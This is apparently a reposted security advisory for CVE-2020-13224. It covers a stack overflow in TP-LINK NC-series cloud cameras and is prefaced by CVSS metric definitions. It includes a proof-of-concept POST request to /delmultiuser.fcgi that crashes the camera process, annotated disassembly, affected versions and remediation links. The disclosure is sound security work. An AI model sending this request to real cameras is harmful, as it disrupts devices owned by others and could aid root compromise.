The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Below is a copy: TP-LINK Cloud Cameras NCXXX Stack Overflow
Vulnerability title: TP-LINK Cloud Cameras NCXXX DelMultiUser Stack Overflow
Author: Pietro Oliva
CVE: CVE-2020-13224
Vendor: TP-LINK
Product: NC200, NC210, NC220, NC230, NC250, NC260, NC450
Affected versions: NC200 <= 2.1.10 build 200401, NC210 <= 1.0.10 build 200401,
NC220 <= 1.3.1 build 200401, NC230 <= 1.3.1 build 200401,
NC250 <= 1.3.1 build 200401, NC260 <= 1.5.3 build_200401,
NC450 <= 1.5.4 build 200401
Fixed versions: NC200 <= 2.1.11 build 200508, NC210 <= 1.0.11 build 200612,
NC220 <= 1.3.2 build 200508, NC230 <= 1.3.2 build 200508,
NC250 <= 1.3.2 build 200508, NC260 <= 1.5.4 build_200508,
NC450 <= 1.5.5 build 200508
Description:
The issue is located in the httpDelMultiUserRpm method of the ipcamera binary
(Called when deleting multiple users via /delmultiuser.fcgi), where a
comma-delimited list of usernames is passed as an input, and a list of error
codes for each user deletion attempt is returned to the user via HTTP. The list
of error codes returned to the user is temporary stored in a fixed-size stack
buffer, while there in no limit on the number of usernames that the user can
specify. Since the error codes are concatenated in a loop without any boundary
checks until a string terminator has been found in the user-supplied string, a
stack-based buffer overflow can occur if the user provided an input string
with enough commas or usernames.
Impact:
Attackers could exploit this vulnerability to remotely crash the ipcamera
process, or remotely execute arbitrary code as root.
Exploitation:
An attacker would first need to authenticate to the web interface and make a
request similar to the following to trigger a crash of the ipcamera process:
POST /delmultiuser.fcgi HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Type: application/x-www-form-urlencoded
Cookie: sess=xxxxx
Content-Length: xxxx
Usernames=,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,&token=xxxxx"
Evidence:
The disassembly of affected code from an NC200 camera is shown below:
sym.httpDelMultiUserRpm:
; Get pointer to Usernames param from HTTP request
0x0047ee90 lw a0, (env)
0x0047ee94 lw a1, -0x7fe4(gp)
0x0047ee98 nop
0x0047ee9c addiu a1, a1, -0x73b0 ; "Usernames" string
0x0047eea0 lw t9, -sym.httpGetEnv(gp)
0x0047eea4 nop
0x0047eea8 jalr t9
0x0047eeac nop
; Save the pointer and return error if it is NULL
0x0047eeb0 lw gp, (arg_10h)
0x0047eeb4 sw v0, (arg_usernames)
0x0047eeb8 lw v0, (arg_usernames)
0x0047eebc nop
< 0x0047eec0 bnez v0, 0x47eed4
0x0047eec4 nop
0x0047eec8 addiu v0, zero, -1
< 0x0047eecc b 0x47f0bc
0x0047eed0 sw v0, (arg_46ch)
; If the pointer is not null, initialize to 0 the error code buffer on the stack
> 0x0047eed4 addiu v0, fp, 0x40
0x0047eed8 move a0, v0
0x0047eedc move a1, zero
0x0047eee0 addiu a2, zero, 0x400
0x0047eee4 lw t9, -sym.imp.memset(gp)
0x0047eee8 nop
0x0047eeec jalr t9
0x0047eef0 nop
0x0047eef4 lw gp, (arg_10h)
; Copy the arg_usernames pointer to arg_usernames_copy
0x0047eef8 lw v0, (arg_usernames)
0x0047eefc nop
0x0047ef00 sw v0, (arg_usernames_copy)
; Get a pointer to the first occurrence of the comma character and store it
> 0x0047ef04 lw a0, (arg_usernames_copy)
0x0047ef08 addiu a1, zero, 0x2c
0x0047ef0c lw t9, -sym.imp.strchr(gp)
0x0047ef10 nop
0x0047ef14 jalr t9
0x0047ef18 nop
0x0047ef1c lw gp, (arg_10h)
0x0047ef20 sw v0, (ptr_to_next_comma)
; If the pointer is NULL go and delete the last username in the list
0x0047ef24 lw v0, (ptr_to_next_comma)
0x0047ef28 nop
< 0x0047ef2c beqz v0, 0x47efc0
0x0047ef30 nop
; Replace the comma character with a string terminator and delete the user
0x0047ef34 lw v0, (ptr_to_next_comma)
0x0047ef38 nop
0x0047ef3c sb zero, (v0)
0x0047ef40 lw a0, (arg_usernames_copy)
0x0047ef44 lw t9, -sym.swUMDelUser(gp)
0x0047ef48 nop
0x0047ef4c jalr t9
0x0047ef50 nop
; Create a string with the error code from swUMDelUser
0x0047ef54 lw gp, (arg_10h)
0x0047ef58 sw v0, (deluser_error_code)
0x0047ef5c addiu v0, fp, 0x448
0x0047ef60 move a0, v0
0x0047ef64 lw a1, -0x7fe4(gp)
0x0047ef68 nop
0x0047ef6c addiu a1, a1, -0x73a4 ; '{"errorCode":&d},'
0x0047ef70 lw a2, (deluser_error_code)
0x0047ef74 lw t9, -sym.imp.sprintf(gp)
0x0047ef78 nop
0x0047ef7c jalr t9
0x0047ef80 nop
; Concatenate the error code string with other error codes on the stack
0x0047ef84 lw gp, (arg_10h)
0x0047ef88 addiu v0, fp, 0x40
0x0047ef8c addiu v1, fp, 0x448
0x0047ef90 move a0, v0
0x0047ef94 move a1, v1
0x0047ef98 lw t9, -sym.imp.strcat(gp) ; concatenate err code
0x0047ef9c nop
0x0047efa0 jalr t9
0x0047efa4 nop
; Increase the pointer by one to the next username
0x0047efa8 lw gp, (arg_10h)
0x0047efac lw v0, (ptr_to_next_comma)
0x0047efb0 nop
0x0047efb4 addiu v0, v0, 1
; Store the updated pointer and skip the last/only username deletion code
< 0x0047efb8 b 0x47f034
0x0047efbc sw v0, (arg_usernames_copy)
; Delete the last/only username in the list and concatenate error code
> 0x0047efc0 lw a0, (arg_usernames_copy)
0x0047efc4 lw t9, -sym.swUMDelUser(gp)
0x0047efc8 nop
0x0047efcc jalr t9
0x0047efd0 nop
0x0047efd4 lw gp, (arg_10h)
0x0047efd8 sw v0, (deluser_error_code)
0x0047efdc addiu v0, fp, 0x448
0x0047efe0 move a0, v0
0x0047efe4 lw a1, -0x7fe4(gp)
0x0047efe8 nop
0x0047efec addiu a1, a1, -0x73a4 ; '{"errorCode":&d},'
0x0047eff0 lw a2, (deluser_error_code)
0x0047eff4 lw t9, -sym.imp.sprintf(gp)
0x0047eff8 nop
0x0047effc jalr t9
0x0047f000 nop
0x0047f004 lw gp, (arg_10h)
0x0047f008 addiu v0, fp, 0x40
0x0047f00c addiu v1, fp, 0x448
0x0047f010 move a0, v0
0x0047f014 move a1, v1
0x0047f018 lw t9, -sym.imp.strcat(gp) ; Concatenate err code
0x0047f01c nop
0x0047f020 jalr t9
0x0047f024 nop
0x0047f028 lw gp, (arg_10h)
< 0x0047f02c b 0x47f04c
0x0047f030 nop
; Checks if the string terminator has been found.
> 0x0047f034 lw v0, (ptr_to_next_comma)
0x0047f038 nop
; If yes, return the error codes to the user via HTTP
< 0x0047f03c beqz v0, 0x47f04c
; Otherwise, continue deleting users until the NULL terminator is found.
0x0047f040 nop
< 0x0047f044 b 0x47ef04
Mitigating factors:
There is very limited control over the buffer that will eventually overwrite
the saved return address. The only part of the buffer that can be slightly
controlled is the error code by using existing, non-existing, or invalid
usernames, since error codes can change in content and length. If an attacker
managed to find a way to carefully combine error codes and obtain a valid
address after return address overwrite, arbitrary code execution as root
could be achieved.
Remediation:
Install firmware updates provided by the vendor to fix the vulnerability.
The latest updates can be found at the following URLs:
https://www.tp-link.com/en/support/download/nc200/#Firmware
https://www.tp-link.com/en/support/download/nc210/#Firmware
https://www.tp-link.com/en/support/download/nc220/#Firmware
https://www.tp-link.com/en/support/download/nc230/#Firmware
https://www.tp-link.com/en/support/download/nc250/#Firmware
https://www.tp-link.com/en/support/download/nc260/#Firmware
https://www.tp-link.com/en/support/download/nc450/#Firmware
Disclosure timeline:
2nd May 2020 - Vulnerability reported to vendor.
19th May 2020 - Patched firmware provided by vendor for verification.
19th May 2020 - Confirmed the vulnerability was fixed.
15th June 2020 - Firmware updates released to the public.
15th June 2020 - Vulnerability details are made public.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum